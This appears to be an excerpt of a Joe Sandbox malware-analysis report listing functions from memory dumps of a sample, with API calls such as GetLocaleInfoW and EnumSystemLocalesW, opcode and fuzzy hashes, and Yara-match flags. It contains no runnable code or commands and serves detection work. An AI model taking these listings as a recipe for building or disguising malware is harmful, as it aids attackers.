Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
Instruction ID: 6b67f736e2e63cc60f408e8e0dfee7a9fd2cac623ca874a3f295f3da83e4a478
Opcode Fuzzy Hash: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
Instruction Fuzzy Hash: 88F0F631740218B7DB11AF61AC01FAE3B71DF48711F90005BFC0527292CE355E509A9D

Uniqueness

Uniqueness Score: -1.00%

Function 04332607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
Instruction ID: f30d0bf30d07b22a0eb694ad5c2c292086324127517158480631b2db696eab66
Opcode Fuzzy Hash: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
Instruction Fuzzy Hash: 33023D71E002199FDF14CFA9D8806AEB7F1FF88325F1592AAD819EB344D731A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
Instruction ID: 57b2c8c2af9200c539743d1e838558d093200d52225ae661a65c97ab255a42b1
Opcode Fuzzy Hash: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
Instruction Fuzzy Hash: 49024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 0433BAB2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0433BAAD,00000000,?,00000008,?,?,04343896,00000000), ref: 0433BCDF

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
Instruction ID: feb4bd9b9a9343e7bc24e1d905511e2325d8cecc424340ad0b95ac0b30a4cd63
Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
Instruction Fuzzy Hash: BFB12C31610608DFD715CF28C486B65BBA0FF45366F259698E89ACF2E2C735F991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041B84B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B846,?,?,00000008,?,?,0042362F,00000000), ref: 0041BA78

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
Instruction ID: 0c2c29198f1904db5ab12468f0c2f7b68f4f63301914c53b8217cadea3e25972
Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
Instruction Fuzzy Hash: 6CB17E716206088FD715CF28C486BA57BE0FF45364F258659E9D9CF3A1C739E982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 04340905 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

Part of subcall function 04336F80: _free.LIBCMT ref: 04336FDF
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04340959

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
Instruction ID: 07260ebc37a46f7c65885f3d08683d3ef005ebd982decdbab8267f8e4ca20eeb
Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
Instruction Fuzzy Hash: 36219D72A15206ABEB28AE64CC41BBA73F8EF81315F10217AEF0596150EB75B944CA50

Uniqueness

Uniqueness Score: -1.00%

Function 0042069E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004206F2

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
Instruction ID: 9cee96005927a1573ed79b1b6da19a4e5e72af736dd4be10e0bf17a0e1069c17
Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
Instruction Fuzzy Hash: 7421A472610226ABDB249A25EC41BBB77E8EB80314F50017FFD05D6242EB79ED44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0434058D Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,043345A4,?,04340CE2,00000000,?,?,?), ref: 043405FF

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
Instruction ID: 03d2e842734334e81b7f88b6fbf1679f2540d5c3d29d808f051ef2c9eb18b701
Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
Instruction Fuzzy Hash: F71106367043019FEB18AF39D8916BAB7E1FFC0319B14442DEA8687A40D7757542CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04340B35 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,043408D3,00000000,00000000,?), ref: 04340B61

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
Instruction ID: 4f1bb8f9949aeba609493505220b7dc7ac2d40734d8e87f86c255a1316c98e0a
Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
Instruction Fuzzy Hash: 41F0F9327101167FDB2C5A248845BFE77B8DB8076CF050969EE45A3140EA34FD4186D8

Uniqueness

Uniqueness Score: -1.00%

Function 004208CE Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042066C,00000000,00000000,?), ref: 004208FA

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
Instruction ID: 95b118f29787940bb019709f183f2c3e5714f1a92d3f33ac24e0601bbd6709b7
Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
Instruction Fuzzy Hash: 03F04E727001257FEB245B1598057BB77A8DB40314F51442AEC47A3242DA38BD81C5D4

Uniqueness

Uniqueness Score: -1.00%

Function 04340903 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

Part of subcall function 04336F80: _free.LIBCMT ref: 04336FDF
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04340959

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
Instruction ID: 56c15eba34e1d8a9d82db0ded2e5aae82e44c391677c5b3fe80e1507a88db12e
Opcode Fuzzy Hash: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
Instruction Fuzzy Hash: 47F0A432B51209ABEB28AB64DC41BFA73ACDF85325F0111BAFB06D7250DA747D058794

Uniqueness

Uniqueness Score: -1.00%

Function 04340628 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,043345A4,?,04340CA6,043345A4,?,?,?,?,?,043345A4,?,?), ref: 04340674

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
Instruction ID: f6d35e189c9f616e2ceadf97643519e237f1e6055d26b7a3b2c115764f64a886
Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
Instruction Fuzzy Hash: 67F046363003051FEB289F399C91ABA7BE0EFC032CF15442DFA068B680D6B5B802CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0433774B Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,04334002,?,00000004), ref: 0433779E

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0fa90c1a792b4f576805d634ceb77212e8dbb6f590b38d2f3a598ff2e07973d6
Instruction ID: 01093f619bc32b8fbf4496884a140a7205e31f2f4782fad289f6e45d42228c51
Opcode Fuzzy Hash: 0fa90c1a792b4f576805d634ceb77212e8dbb6f590b38d2f3a598ff2e07973d6
Instruction Fuzzy Hash: 48F09671741318BBEB11AF61EC01F7E7B65DF48712F90406AFC0567250CF716E109699

Uniqueness

Uniqueness Score: -1.00%

Function 04337358 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04331C6D: RtlEnterCriticalSection.NTDLL(?), ref: 04331C7C

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 04337390

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
Instruction ID: aeec273a4dcb645b9c67a84fc4231e84b9ebce2ab8e69247ef3b22ee643b9625
Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
Instruction Fuzzy Hash: 94F04F72A50304AFEB14EF68DC45B9D37F0EF04725F10A12AE514EB2A0CB7459408F89

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00411A06: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,004395B8,00000008,00416B87,?,?,?), ref: 00411A15

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
Instruction ID: 132fde00c3026ba385e258918c38b9eec635062562826c8cbc0ed6069a56d62f
Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
Instruction Fuzzy Hash: B2F03131A503009FD714EF69D846B9D37F0EB04714F10512BF514EB2E1CB7849408B49

Uniqueness

Uniqueness Score: -1.00%

Function 04340542 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,04340D04,043345A4,?,?,?,?,?,043345A4,?,?,?), ref: 04340579

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
Instruction ID: d05ed0c63cd5342c633c74350e8f0993be6bacf6d13038ac547f77c2041506b8
Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
Instruction Fuzzy Hash: 91F055363002049BCB189F79D8456BABFE0EFC2714B4A409AFF058B280C631A843CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004202DB Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,00420A9D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 00420312

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
Instruction ID: c54caae612f79c45943fa80a9590922199881531d53ba21540ab7825707139eb
Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
Instruction Fuzzy Hash: FEF0273530021497CB149B35E80966ABF90EB81714B86405EEE058B242C6759C43CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04329E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,043295DF), ref: 04329E72

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
Instruction ID: 26a6103bf3a44b775271bddc1855947db1592e5ed7f4ffd05836c10e882115b1
Opcode Fuzzy Hash: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
Instruction ID: 26a6103bf3a44b775271bddc1855947db1592e5ed7f4ffd05836c10e882115b1
Opcode Fuzzy Hash: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0432F6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0432F818

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 4d53ac0881a035a5bd95d60716b935a957efe1aa3be314a68b1800bbe5aac491
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: BB513231300A7957FB38497C8764BBE73B99F06388F183A1AD84387691D605FA45B352

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 00420C1A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420C1A

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
Instruction ID: d0f1a20189e36393daad9c8fb7d6be9c176ac9989c87cef9d6c19eed9d752231
Opcode Fuzzy Hash: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
Instruction Fuzzy Hash: 09A012306011008B63104F305D8460C3A94594459034500386004C0020DE304094D708

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF69 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0dd073aee0751bb9f29e6e223ed45b7845f72cc89632174a73f14db3effea76
Instruction ID: f7246f358eead72590201e80fcec4c79c46f6691cdae857f55203416c7e6201f
Opcode Fuzzy Hash: d0dd073aee0751bb9f29e6e223ed45b7845f72cc89632174a73f14db3effea76
Instruction Fuzzy Hash: 38320232E69F014DD7239635CD62336A249AFB73C4F55D737E82AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 0432C258 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: d71b2d45d6d587f9c1ccd0a7a03c3b76c70b65e4c03c7c955b593a1ae29cc19d
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 869157722084B34ADB6E467E963443FFFE15A422A131A379ED4F2CB5C5FE24E164D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFF1 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 2a58f6a2309fccaa231e80b192b86db65d6159ebe224a31801071a150f3da30d
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 939176726080A389E729477984B403FFFE15A513A131A07BFE4F2DE2C5EE38C555E628

Uniqueness

Uniqueness Score: -1.00%

Function 0432C513 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 1f93916732f5bef93ba0aec60dea9e942b596ce0289334895c1d1991dc10b68d
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 9F915A732090B34EEB69463E867803DFFE15A422A171E379ED4F2CA5C5FE14E264D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2AC Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

